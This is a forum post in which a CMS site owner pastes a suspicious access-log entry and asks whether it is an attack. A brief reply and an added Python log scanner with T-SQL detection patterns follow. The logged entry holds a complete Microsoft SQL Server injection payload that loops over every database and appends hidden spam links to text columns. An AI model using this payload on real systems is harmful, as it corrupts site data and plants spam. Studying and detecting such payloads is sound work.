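This is a hacking attempt, right????? Something strange just showed up several times in a row in my logs, so I copied it.
I looked it up online and it's said to be an injection attack, but I've never seen a log entry like this before, so it's scary..
XE and Rhymix both have defenses built in, right?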
141.101.70.37 \ 404 5770 "http://google.com');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style=\"display:none\">pfizer viagra coupons <a href=\"http://www.liberitutti.info/page/viagra-coupons-from-pfizer\" rel=\"nofollow\">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''liberitutti.info'''' when 1 then ''''click'''' else ''''discount prescription coupons'''' end +''''</a> coupons for viagra 2016</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0');declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''<div style=\"display:none\">pfizer viagra coupons <a 
href=\"http://www.liberitutti.info/page/viagra-coupons-from-pfizer\" rel=\"nofollow\">''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''liberitutti.info'''' when 1 then ''''click'''' else ''''discount prescription coupons'''' end +''''</a> coupons for viagra 2016</div>'''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--
It seems so. This kind of SQL can't be executed at the XE or Rhymix level. I'm not certain whether it's truly impossible, but unless the FTP or DB server is breached, I don't think it will work.
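An added example, not part of the original thread: a small Python scan for access-log lines in the shape posted above, flagging header values that carry the T-SQL (Microsoft SQL Server) markers visible in that entry. It assumes the two quoted fields are Referer and User-Agent; the sample lines, addresses and marker names are constructed for illustration.

```python
import re

# Quoted log fields, honoring backslash-escaped quotes as in the entry above.
QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')

# T-SQL markers visible in the logged request; a normal Referer or
# User-Agent has no reason to contain them. Names are illustrative.
MARKERS = {
    "quote_break": re.compile(r"'\s*\)\s*;"),
    "declare_var": re.compile(r"\bdeclare\s+@\w+", re.I),
    "dynamic_exec": re.compile(r"\bexec\s*\(\s*@\w+", re.I),
    "catalog_enum": re.compile(r"\b(sys\.databases|sysobjects|information_schema\.)", re.I),
    "trailing_comment": re.compile(r"--\s*$"),
}

# Constructed sample lines (documentation IP ranges, shortened header values).
SAMPLE = [
    r'''203.0.113.7 \ 404 5770 "http://example.com');declare @s varchar(8000);exec (@s);--" "Mozilla/5.0 (Windows NT 6.1; rv:24.0)');declare @s varchar(8000);exec (@s);--"''',
    r'''198.51.100.4 \ 200 1234 "http://example.com/board" "Mozilla/5.0 (X11; Linux x86_64)"''',
]

def parse_line(line):
    """Split 'ip ... status bytes "referer" "user-agent"' into a dict."""
    quoted = QUOTED.findall(line)
    head = line.split('"', 1)[0].split()
    if len(quoted) < 2 or len(head) < 3:
        return None
    return {"ip": head[0], "status": head[-2], "referer": quoted[-2], "user_agent": quoted[-1]}

def scan(lines):
    """Return (ip, status, field, marker names) for each suspicious header."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ("referer", "user_agent"):
            found = sorted(n for n, rx in MARKERS.items() if rx.search(rec[field]))
            if len(found) >= 2:  # two or more markers, to limit false positives
                hits.append((rec["ip"], rec["status"], field, found))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The status column in each hit shows how the server answered that request, which is the first thing to check when triaging entries like the 404 above.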